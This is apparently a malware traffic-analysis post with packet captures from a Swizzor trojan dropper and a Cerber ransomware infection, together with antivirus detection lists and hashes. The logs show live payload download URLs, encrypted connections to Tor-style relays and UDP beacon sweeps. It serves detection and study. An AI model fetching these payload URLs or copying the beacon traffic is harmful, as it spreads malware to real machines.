Swizzor Malware Trojan Downloader Dropper r6.php?cmd=e PCAP file Download Traffic Analysis Sample

SHA256: e94e398e06ea23be9866db444773c1ca16edb0e6042e51878442a4991c17cf4b
File name: r6.exe
Detection ratio: 19 / 62
Analysis date: 2017-07-06 02:12:20 UTC ( 0 minutes ago )
AegisLab Mal.Swizzor.Gen!c 20170706
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9997 20170705
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170420
Endgame malicious (high confidence) 20170629
ESET-NOD32 a variant of Win32/Kryptik.FUEK 20170705
Invincea heuristic 20170607
Kaspersky UDS:DangerousObject.Multi.Generic 20170705
McAfee Artemis!081AC2E55C35 20170706
McAfee-GW-Edition BehavesLike.Win32.Dropper.gh 20170705
Qihoo-360 HEUR/QVM10.1.4A81.Malware.Gen 20170706
Rising Trojan.Kryptik!8.8 (cloud:qqKhnl05I8F) 20170706
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Gozi-C 20170705
Symantec ML.Attribute.HighConfidence 20170705
Tencent Win32.Trojan.Swizzor.Dla 20170706
TrendMicro Mal_Swizzor 20170706
TrendMicro-HouseCall Mal_Swizzor 20170706

2017-07-05 16:38:45.795048 IP 192.168.1.102.50327 > 192.168.1.100.55555: Flags [P.], seq 1:438, ack 1, win 2053, length 437
E…V.@….R…f…d…..p…..zP…./..GET /r6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://192.168.1.100:55555/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100:55555
Connection: Keep-Alive

2017-07-05 16:38:45.795076 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], ack 438, win 237, length 0
E..(..@.@……d…f…….z.p.bP….5..
2017-07-05 16:38:45.795363 IP 192.168.1.100.55555 > 192.168.1.102.50327: Flags [.], seq 1:5841, ack 438, win 237, length 5840
E…..@.@……d…f…….z.p.bP…….HTTP/1.1 200 OK
Date: Wed, 05 Jul 2017 20:38:45 GMT
Server: Apache/2.4.18 (Debian)
Last-Modified: Wed, 05 Jul 2017 20:19:12 GMT
ETag: “79000-55397b6a51939″
Accept-Ranges: bytes
Content-Length: 495616
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

2017-07-05 16:40:46.672264 IP 192.168.1.102.50328 > 50.87.37.56.80: Flags [P.], seq 2021661667:2021661880, ack 1680714260, win 256, length 213: HTTP: GET /modules/pm/class/Hdkfk.zip HTTP/1.1
E…W9@….$…f2W%8…Px…d-..P…….GET /modules/pm/class/Hdkfk.zip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: lebabillart.com


A..^.&G….).
….9………    [&…J.Y…………z…W.C `[.k.
…{.#.?..!…”U.).
../………J.z.|.C.U….EL-f?.gyG,.    ….A…4m….m4n..PD……!R+..H……G:-.0..W.h.r.S+D…@v.”……@…..=.R..    .4..X……0….*..-..K…..8w.c6.)k….    w8.=…..vOr.4.Rj..P..Ht,$U.p.E..~1F..vPXW….4..#xy.sD6.h..a…d`JyK4.Qo)=..,.-.x…Y.u.*…./.^..2.?.o…..S……………cX2……..9.GQW..Gg.5..i.{.7.<5.j..V……..+…………
H.f’…w..UBkl.9v.;…..d3m<..WP.-
&..-.p .a..34……0…{.RC13C
2017-07-05 16:41:46.995591 IP 192.168.1.102.50415 > 37.48.122.26.80: Flags [P.], seq 3572951193:3572951377, ack 3206900573, win 256, length 184: HTTP: GET / HTTP/1.1
E…#s@…uL…f%0z….P…..%k]P…….GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0
Host: curlmyip.net

2017-07-05 16:40:53.778871 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 1028276613:1028276858, ack 2829810775, win 256, length 245: HTTP
E…I.@……..f…    …P=JA…|WP…l……………….a.n…..ND.~.b.zBz.}…N.”…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..{…&.$..!www.r4qr7kaimymhqpkeohxqwk6ma.com………
………………………    .
… ……………………………….
2017-07-05 16:40:53.929880 IP 192.168.1.102.50329 > 171.25.193.9.80: Flags [P.], seq 245:379, ack 1011, win 252, length 134: HTTP
E…I.@….Q…f…    …P=JBz…IP…X…….F…BA………d…..=……:.5..&X..dFU…….d….f.,’.P9…H.qV..}-………..0V.m……..C.E3a}../=.G.t…
.Y..t.3@.?{…..t..

…..f………www.btpv.com………
………………………    .
… ……………………………….
2017-07-05 16:40:59.807137 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 224:358, ack 755, win 253, length 134: HTTP
E…2B@…V….f.S.”…P..b…..P…vx……F…BA.’.i.l…y-.$..,K.C….G.Z4.z…l…w…..dz:…../._.Wny…4.lq]……….0″.`.N.,v…&k%.p.4.a}.*..E.K=.4…….._.m/EN.su
2017-07-05 16:40:59.912870 IP 192.168.1.102.50330 > 208.83.223.34.80: Flags [P.], seq 358:432, ack 814, win 253, length 74: HTTP

…..g………www.vsgg3.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.272209 IP 192.168.1.102.50344 > 89.166.109.22.9001: Flags [P.], seq 3688677451:3688677696, ack 2907826683, win 256, length 245
E…G.@…*….fY.m…#)…K.Q..P…f<………………..”..p>…..JL.J/.f……-…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..{…&.$..!www.3bf6dju2v7wvcd2tdwc7xuyjz.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.272587 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 590545619:590545845, ack 2885913782, win 256, length 226
E..
sp@……..f[y……#3……P…>……………..G….:.]._.x..”.Zb.Nx..i.7.=k..H.

…..h………www.z6trd5.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.272960 IP 192.168.1.102.50346 > 79.172.193.32.443: Flags [P.], seq 3271176865:3271177105, ack 393248132, win 256, length 240
E…S.@……..fO.. ……2..p}.P………………..bo.e..p.X…..K?y……!|.K…..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.ti5cggc3w6fh6qkggygt.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.273351 IP 192.168.1.102.50347 > 144.76.91.135.9001: Flags [P.], seq 4092234089:4092234329, ack 1379166419, win 256, length 240
E…q.@……..f.L[…#)…iR4h.P………………R..f…..)]#..t…t..1KHIAY.(.(…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.oi44tlwdjouche27j6uk.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.273760 IP 192.168.1.102.50348 > 193.11.114.45.9002: Flags [P.], seq 32464236:32464468, ack 1167986777, win 256, length 232
E…uJ@….V…f..r-..#*..]lE..YP………………*…@..R…/e………2………..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..n………www.jfn2xgmrvbtv.com………
………………………    .
… ……………………………….

2017-07-05 16:41:01.275969 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 3057837041:3057837274, ack 656463986, win 256, length 233
E…ha@……..f[…..#).B..’ .rP…M…………..?…U0F..:#.dw.K<d…f…..l.U….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..o………www.kw3lbndwebwz3.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.276371 IP 192.168.1.102.50355 > 159.203.32.149.443: Flags [P.], seq 3989707829:3989708070, ack 851698541, win 256, length 241
E…..@…hY…f.. ……..52..mP……………….    PI[..iU.b…..x..%.jC.d…I…..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..w…”. …www.tb3xh2ild426zjbyax5ml.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.276729 IP 192.168.1.102.50356 > 138.201.247.2.61001: Flags [P.], seq 1140788138:1140788371, ack 498199005, win 256, length 233
E…&,@……..f…….IC…….P…6_………………oE}….9…-……..}.D……H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..o………www.vsn57bxc3mb2o.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.277127 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1708854068:1708854308, ack 2197240829, win 256, length 240
E…..@….=…fT…..#)e..4..;.P………………….^e*ao..H.-.’-…u(WKu.[.osp…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.6jedagsxg3mrdwiddka7.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.277578 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 3813650108:3813650348, ack 2006550589, win 256, length 240
E…..@….=…f. B……O..w..=P……………….l….Mb’..1q..V..Pp.r.Yl.Cv..M…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.ihinmgwvwlruzfro7o44.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.277964 IP 192.168.1.102.50333 > 78.46.51.124.443: Flags [P.], seq 3319424194:3319424434, ack 3060906392, win 256, length 240
E…3,@……..fN.3|……d..q..P…)k…………..~.:m….g&0X…igC.{MD.J………H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.evtxd72nmocj47moklbg.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.278632 IP 192.168.1.102.50334 > 83.168.200.204.80: Flags [P.], seq 2944603737:2944603981, ack 689799960, win 256, length 244: HTTP
E….^@……..fS……P…Y)…P…V…………..<.o……=b……..X…..89….    ..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..z…%.#.. www.irygrdulouqccdt2bf27xymd.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.279174 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 1410216554:1410216799, ack 244719982, win 258, length 245
E…Hv@….8…f3.2…#)T.2j..!nP…i…………….6y.d…..+;../.en…19WZd…….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..{…&.$..!www.aak45gn42iiiixiph5ekrkj7j.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.279566 IP 192.168.1.102.50336 > 78.47.18.110.80: Flags [P.], seq 3503629744:3503629982, ack 1339106153, win 256, length 238: HTTP
E…~8@…X….fN/.n…P..%.O.#iP…0……………g\..$1v.{.n.N..,-..T;.\..)…….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..t………www.6di5z3rikdmc6fzplr.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.279935 IP 192.168.1.102.50337 > 94.100.6.27.443: Flags [P.], seq 399576572:399576812, ack 3647675222, win 260, length 240
E…].@…u….f^d………..k.VP………………=.w….@..Y..}N.Mp.z3.qon.rQ.3W…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.642l5nfdken6ng6khuvd.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.280372 IP 192.168.1.102.50338 > 37.235.55.83.443: Flags [P.], seq 1010240698:1010240936, ack 667920148, win 260, length 238
E….)@….l…f%.7S….<7..’…P…5r………………’..=C{….
.E0..M.P….(.-E..H.

…..t………www.2yc2podezduls5a2hc.com………
………………………    .
… ……………………………….

2017-07-05 16:41:01.318500 IP 192.168.1.102.50341 > 62.78.245.129.9001: Flags [P.], seq 2340612092:2340612331, ack 167635855, win 256, length 239
E…b.@……..f>N….#)….    …P…………………(.w.-.e.0#?.x.m…..n….J;.0..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..u… …..www.7gb7wwcxdddw2y72xka.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.318813 IP 192.168.1.102.50342 > 46.41.130.68.443: Flags [P.], seq 2491986743:2491986984, ack 1654762805, win 256, length 241
E….I@…Y….f.).D…….7b..5P….9………….J;..f….x…..Y.y@..5.X
1i..<+O..H.

…..w…”. …www.5deqfvyuplq76nmo5kygv.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.319307 IP 192.168.1.102.50358 > 138.197.133.81.443: Flags [P.], seq 841677261:841677487, ack 4217093403, win 256, length 226
E..
..@…”….f…Q….2*…[..P…<

…..h………www.3qkvdr.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.334877 IP 192.168.1.102.50360 > 212.47.239.163.12001: Flags [P.], seq 3227276382:3227276607, ack 3713232475, win 256, length 225
E..    .9@…f….f./…….\T^.Sn[P…79…………….&.W]…^y@..`x….e…..).S.H..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..g………www.nw6ah.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.349150 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 1969936195:1969936430, ack 66593790, win 256, length 235
E…R.@….2…fY…..#)uj.C..#.P………………VU5..*yH..iah2…./K..0.u…t.`…H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..q………www.6rg6elubllem6ie.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.349597 IP 192.168.1.102.50361 > 147.135.210.101.443: Flags [P.], seq 894183362:894183591, ack 38755765, win 256, length 229
E…j.@…g….f…e….5L’..O].P….n……………….IyT………….s.x…g(.2..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..k………www.tzlpgwndi.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.368468 IP 192.168.1.102.50350 > 158.69.92.127.443: Flags [P.], seq 225:359, ack 749, win 253, length 134
E…u@@….6…f.E\…….\B….P….]……F…BA.sv…w.rJ)e……….j.7bc.,p..GV.E…f….e
.7.

…..u… …..www.nuhwpyyd6nfnkq3v5uy.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.374806 IP 192.168.1.102.50359 > 195.16.89.145.938: Flags [P.], seq 1471468849:1471469074, ack 3395312164, win 256, length 225
E..    d6@……..f..Y…..W..1.`Z$P…[……………….b..w..1.X.I..”.o.v….U.w….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..g………www.a7vt5.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.399201 IP 192.168.1.102.50354 > 91.134.139.215.9001: Flags [P.], seq 233:367, ack 750, win 253, length 134
E…hb@….{…f[…..#).B..’ ._P…xx……F…BA..ck…….f.Z~…..2.RV….s….3kw..?l…W:Iq……….R…..h0……….0)3o…………..O…37.!7..VC…d..1….?…3x.
2017-07-05 16:41:01.404277 IP 192.168.1.102.50345 > 91.121.230.214.443: Flags [P.], seq 226:360, ack 1007, win 252, length 134

…..s………www.h3ahgcxy6qbyhzkao.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.806750 IP 192.168.1.102.50357 > 89.16.176.158.9001: Flags [P.], seq 443:1029, ack 2331, win 256, length 586
E..rR.@……..fY…..#)uj….-.P……….. K[~h.{..1..`……wg.D…..O4.’….. .P.h…n…..z..*.>P.~.Jn.i…o.fK..B..a..{…….%..I..”……”jb..W.%.j…3’f…b…U..’
.!……y@.m.(.5…}…..=.0……B.x….n.o..n..5……a..J&.].q.i[(<..Q..wW……..S<.Kz.t .~..&..4…..Uqp.:.p.49……ZN0j+g.    .t.8!..i….d~…/L=..d.’*.I.T..f.s….j….<..

…..p………www.exzjuqdla2zuht.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.839503 IP 192.168.1.102.50332 > 213.32.66.192.443: Flags [P.], seq 1034:1620, ack 2380, win 256, length 586
E..r..@……..f. B……O..w…P…G……. ..1….|…M.fm..M…N”..[..p.e=…. =..R.k.Q……5…9…*{ …#…. v..l.%../f@(nr5*….W|.U……..V2e..Nd…iZ..d…I’}#.%.r….a.
.{Z..X+..R*…S~…qR1..k.e.a…/..KQ.6.v..n.O.~\…,D/&pV…l.`……oq3…..}…..w|…..71v……_f.-.@……%,u1.Pl..W….E…F.Vq…d…yiA>.q.1…7…..a5|..,..6H.\.qQ…….K.]K………o..+.r. ki.>Th.Tr|’a.M’U….p(.GO..&….E..?………#…    O….6……g…$.f.}.{wh.H………<W…n..#.JV.u.!.-<.3.L…..sPo..*.;~.~B..U……-…..=t…5\….~=..j^…….##@.P=(e.e….9..

…..r………www.qj5nowel4s7gpeeh.com………
………………………    .
… ……………………………….
2017-07-05 16:41:01.863714 IP 192.168.1.102.50362 > 89.163.128.59.443: Flags [P.], seq 447:1033, ack 2350, win 256, length 586
E..r.4@…Le…fY..;….p8i…..P…:,…… H.q.G4……DR..a..3..M-………… e.T…    F..p…+!.n.a….!..q&rM.Y…LK..(1.f*g@..OPF|…/.8..[.f.NN.D….#Xf    5 E.v;}.<soH..s..Be..c..kQ..n.6. ^n0.X1`..=,k..BFL.S..W…………s……..QS%…….X.7.P.D..i…………@…vv1`….vsf.. .sY.*..L….BT.j.Y.]..Wb.s..a.M…BdI………… .pU”…M…    I…*.S……..7#..v+].X….$…..3…%….._F.pl.p.|u.e<~!.).E.q.&…y..w.m.._.).. ……OR…X..    ,………..i.^………%YFk*8t…J[.5Z….2i.(..c….AKv…g..c……$n..!>…&.\.i!…..uk…..j…Mx..r.M.Hn..LF.=$nR..&-9….pe.~….f&.i.}……….e..!…yo….^2..ZRq. ….s
2017-07-05 16:41:01.869640 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 1034:1620, ack 2358, win 256, length 586

…..k………www.qmkzzyzjz.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.068335 IP 192.168.1.102.50367 > 88.198.148.255.443: Flags [P.], seq 3425834539:3425834780, ack 2791446585, win 256, length 241
E…<.@……..fX……..2.+.b.9P…’………………d00uc@./….?j..d…c.].Q…..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..w…”. …www.qkeo5fjh7odaex53nrzo7.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.068537 IP 192.168.1.102.50365 > 144.217.87.78.9001: Flags [P.], seq 1617:2203, ack 2967, win 254, length 586
E..r..@…2T…f..WN..#)R]….Q.P….8…… …….X….P…..0..n..e.YO…5…. .E…..M6U.^…..#xf.g.!..pX..O..p..b .S…X=..N….I.ds..m…m………dM.(…h..L….1(*..U.nR…13…M..H…K……>B.=;d….(M.$ ……..v..w-.x….fH.t……F.O.m_k`…/.+…1..TV..”t$.,…..v+\….?.v.UK.-2c..m..y….w).4.fzI…..j|~….8.S.R…g^%…)..L.s…..n.?….<…!..kR..4….9.|A.!.Vs.ABk.~.Z..f.R..p..\…
….%..v)……Z.g’…e..F4..XP+C…..)….I.K.=O=..E…..,..Ox.S……m…X.Q….(C.t.)…!..bN..7…….s….)|..m..V.S,.8.$.0….|..q………6.=#L.s.8mAE..t….D…p0.B……n09.Ib..T;.!.c….Q&..EA…….].ZRg.V..    .9

…..o………www.oshw5kihq7h6m.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302916 IP 192.168.1.102.50369 > 5.39.33.176.9001: Flags [P.], seq 1333368373:1333368606, ack 523297106, win 256, length 233
E…..@……..f.’!…#)Oy.5.0.RP….M………….Ll
…..I3Y…*s…]……I’..X…H.

…..o………www.2ivry2rhlsedt.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302932 IP 192.168.1.102.50377 > 208.80.154.39.9002: Flags [P.], seq 3909397981:3909398212, ack 1235496428, win 256, length 231
E…..@……..f.P.’..#*….I.-.P………………{.]………:..g….I(..A.vV……H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..m………www.g34wync2gay.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302936 IP 192.168.1.102.50374 > 88.99.68.246.9001: Flags [P.], seq 2809581064:2809581295, ack 3172681866, win 256, length 231
E…c.@…6….fXcD…#).v….H.P…/……………q.EO….n……./.w……W4……H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..m………www.24wsxlew22o.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302941 IP 192.168.1.102.50376 > 212.47.245.76.9001: Flags [P.], seq 3503728016:3503728254, ack 3139782477, win 256, length 238
E… o@…M….f./.L..#)…..%GMP………………o…’S.,R..=d….m!..`z…ot+G….H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..t………www.fres4kxhkdbq4zkuon.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302947 IP 192.168.1.102.50370 > 185.73.220.8.443: Flags [P.], seq 2951769582:2951769824, ack 2938571099, win 260, length 242
E…sz@…/….f.I……..m..’    [P…dz………….z
..+.@…-0..f)k.:..2.u.%……..H.

…..x…#.!…www.nlxzuet4sn2w4e4hj4xufw.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302951 IP 192.168.1.102.50373 > 179.43.168.166.443: Flags [P.], seq 1204194106:1204194345, ack 3572972556, win 260, length 239
E…J~@……..f.+……G..:..<.P….}……………….g………O.[…..m..#.{!D..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..u… …..www.sjoqaev4ide4zrf2hap.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302954 IP 192.168.1.102.50371 > 80.238.122.106.9001: Flags [P.], seq 1823198598:1823198825, ack 679601301, win 256, length 227
E…..@…_X…fP.zj..#)l…(…P…3H………….@?..k….EO[Q..^.Ve..|..
.@.M+.A..H.

…..i………www.smqzyif.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302991 IP 192.168.1.102.50375 > 178.62.66.18.9001: Flags [P.], seq 3599510712:3599510955, ack 2206526366, win 256, length 243
E…=.@……..f.>B…#)..,…..P………………F.._.v…j\.L9D.)y…Rl.xM…..9..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..y…$.”…www.uje4qre7zeih6zxcnmpehhq.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.302995 IP 192.168.1.102.50372 > 185.14.28.216.22: Flags [P.], seq 420702787:420703027, ack 2486638856, win 256, length 240
E…..@…_”…f……….jC.7..P….u………….,.a..7…,..V..f..^.}N1F..z..”k,..H.
…….9.8…….5…    …..E.D.3.2………..A…../……………
…..v…!…..www.aftox7fcxtwy5vfx3m7c.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.303000 IP 192.168.1.102.50335 > 51.141.50.145.9001: Flags [P.], seq 6967:7553, ack 31517, win 256, length 586
E..rH.@……..f3.2…#)T.M…..P……….. .’G5<x..s..E.z..i+…qz…
..H…… yl..K…cyR…7….r………..Y.3d.af…….F…!    …..n…T..

…..u… …..www.x76fxmp6synvp4olcnf.com………
………………………    .
… ……………………………….
2017-07-05 16:41:02.345468 IP 192.168.1.102.50331 > 84.245.27.209.9001: Flags [P.], seq 12156:12742, ack 42950, win 256, length 586
E..r..@……..fT…..#)e.:…..P……….. ..6…F..N<..tUg……..&6..B……. …v#t.-….Ps.|…….1.F~).sS.N.i..$……….#.|.    =_S….y….\(…-~.p..!^..p.
.    …QAH.4…….`cD a…\…..X..m..|.%y…….l….kWP.&.oQ.Aj7.f…..’uB….d..#.}._?`hOk……..-.W.N..-..%..3..0.=D.k.4…|/.K…Ne*zw..fp.1.qL…..n..R.-..SXh.b..e…    .RV..n…….o..B.B.2Pnp..-.W.0….9.OZ…1…ti..2..S.,..x/…n…..I*O.3.R.

…..k………www.qmkzzyzjz.com………
………………………    .
… ……………………………….

========================= DNS REQUESTS =================================

2017-07-05 16:40:46.246003 IP 192.168.1.102.53471 > 75.75.75.75.53: 3090+ A? lebabillart.com. (33)
E..=…….k…fKKKK…5.)9…………..lebabillart.com…..
2017-07-05 16:41:46.683380 IP 192.168.1.102.53472 > 75.75.75.75.53: 44790+ A? resolver1.opendns.com. (39)
E..C…….d…fKKKK…5./.x…………        resolver1.opendns.com…..
2017-07-05 16:41:46.740625 IP 192.168.1.102.53473 > 75.75.75.75.53: 5628+ A? curlmyip.net. (30)
E..:…….l…fKKKK…5.&……………curlmyip.net…..
2017-07-05 16:41:46.790071 IP 192.168.1.102.53474 > 208.67.222.222.53: 1+ PTR? 222.222.67.208.in-addr.arpa. (45)
E..I………..f.C…..5.5a…………..222.222.67.208.in-addr.arpa…..
2017-07-05 16:41:46.830077 IP 192.168.1.102.53475 > 208.67.222.222.53: 2+ A? myip.opendns.com.localdomain. (46)
E..J………..f.C…..5.6.}………….myip.opendns.com.localdomain…..
2017-07-05 16:41:46.860243 IP 192.168.1.102.53476 > 208.67.222.222.53: 3+ AAAA? myip.opendns.com.localdomain. (46)
E..J………..f.C…..5.6.`………….myip.opendns.com.localdomain…..
2017-07-05 16:41:46.898746 IP 192.168.1.102.53477 > 208.67.222.222.53: 4+ A? myip.opendns.com. (34)
E..>………..f.C…..5.*Q…………..myip.opendns.com…..
2017-07-05 16:41:46.940960 IP 192.168.1.102.53478 > 208.67.222.222.53: 5+ AAAA? myip.opendns.com. (34)
E..>………..f.C…..5.*Q…………..myip.opendns.com…..
2017-07-05 16:41:59.775454 IP 192.168.1.102.65176 > 75.75.75.75.53: 29311+ A? ipcast1.dynupdate.noip.com. (44)
E..H…….]…fKKKK…5.4a.r…………ipcast1        dynupdate.noip.com…..
2017-07-05 16:42:14.298395 IP 192.168.1.102.53348 > 75.75.75.75.53: 54941+ A? client.wns.windows.com. (40)
E..D…….`…fKKKK.d.5.0/B………….client.wns.windows.com…..
2017-07-05 16:42:14.316391 IP 192.168.1.102.53348 > 75.75.76.76.53: 54941+ A? client.wns.windows.com. (40)
E..D……a….fKKLL.d.5.0.A………….client.wns.windows.com…..
2017-07-05 16:42:14.576805 IP 192.168.1.102.61411 > 75.75.75.75.53: 10302+ A? BN4SCH101122406.wns.windows.com. (49)
E..M…….U…fKKKK…5.9.C(>………..BN4SCH101122406.wns.windows.com…..
2017-07-05 16:43:23.899661 IP 192.168.1.102.61412 > 75.75.75.75.53: 54931+ A? dns.msftncsi.com. (34)
E..>…….c…fKKKK…5.*.D………….dns.msftncsi.com…..
2017-07-05 16:43:23.916411 IP 192.168.1.102.61413 > 75.75.75.75.53: 2211+ AAAA? dns.msftncsi.com. (34)
E..>…….b…fKKKK…5.*……………dns.msftncsi.com…..
2017-07-05 16:45:02.659817 IP 192.168.1.102.59548 > 75.75.75.75.53: 8336+ A? evoke-windowsservices-tas.msedge.net. (54)
E..R…….M…fKKKK…5.>.( …………evoke-windowsservices-tas.msedge.net…..

Cerber Ransomware Malware Crimeware 77.12.57.x 87.98.176.x PCAP txt File Download Traffic Sample

SHA256: 3929550c9f06e66ccf15aca4808fc9e2f21ee14e343a29ac1b3232e402364c57
File name: 1
Detection ratio: 21 / 61
Analysis date: 2017-07-03 22:43:32 UTC ( 0 minutes ago )
AhnLab-V3 Trojan/Win32.Cerber.C2028306 20170703
Avast Win32:Malware-gen 20170703
AVG Win32:Malware-gen 20170703
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170703
Bkav HW32.Packed.4068 20170703
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20170420
Cyren W32/Cerber.F.gen!Eldorado 20170703
DrWeb Trojan.Siggen7.24571 20170703
Emsisoft Trojan-Ransom.Cerber (A) 20170703
Endgame malicious (high confidence) 20170629
ESET-NOD32 a variant of Win32/GenKryptik.AMYN 20170703
F-Prot W32/Cerber.F.gen!Eldorado 20170703
Invincea heuristic 20170607
McAfee Ransomware-GAQ!4F796AC47AB1 20170703
Qihoo-360 HEUR/QVM20.1.3E97.Malware.Gen 20170703
Rising Trojan.Kryptik!1.AACA (classic) 20170703
SentinelOne (Static ML) static engine – malicious 20170516
Symantec Ransom.Cerber 20170703
TrendMicro Ransom_HPCERBER.SMALY5A 20170703

 

2017-07-03 15:56:12.852094 IP 192.168.1.102.60671 > 103.52.216.15.80: Flags [P.], seq 0:387, ack 1, win 261, length 387: HTTP: GET /1 HTTP/1.1
E…ko@……..fg4…..P.`..e@h.P….L..GET /1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: dbvopeoo.top
Connection: Keep-Alive

 

2017-07-03 15:56:36.340777 IP 192.168.1.102.50642 > 77.12.57.0.6893: UDP, length 25
E..5l……….fM.9……!7.5d250b9731550098970000073
2017-07-03 15:56:36.340860 IP 192.168.1.102.50642 > 77.12.57.1.6893: UDP, length 25
E..5B……….fM.9……!7.5d250b9731550098970000073
2017-07-03 15:56:36.340916 IP 192.168.1.102.50642 > 77.12.57.2.6893: UDP, length 25
E..5{u….x&…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.340921 IP 192.168.1.102.50642 > 77.12.57.3.6893: UDP, length 25
E..5U……….fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.340968 IP 192.168.1.102.50642 > 77.12.57.4.6893: UDP, length 25
E..5g……….fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341039 IP 192.168.1.102.50642 > 77.12.57.5.6893: UDP, length 25
E..5IQ…..G…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341043 IP 192.168.1.102.50642 > 77.12.57.6.6893: UDP, length 25
E..5p……….fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341112 IP 192.168.1.102.50642 > 77.12.57.7.6893: UDP, length 25
E..5^:…..\…fM.9……!6.5d250b9731550098970000073
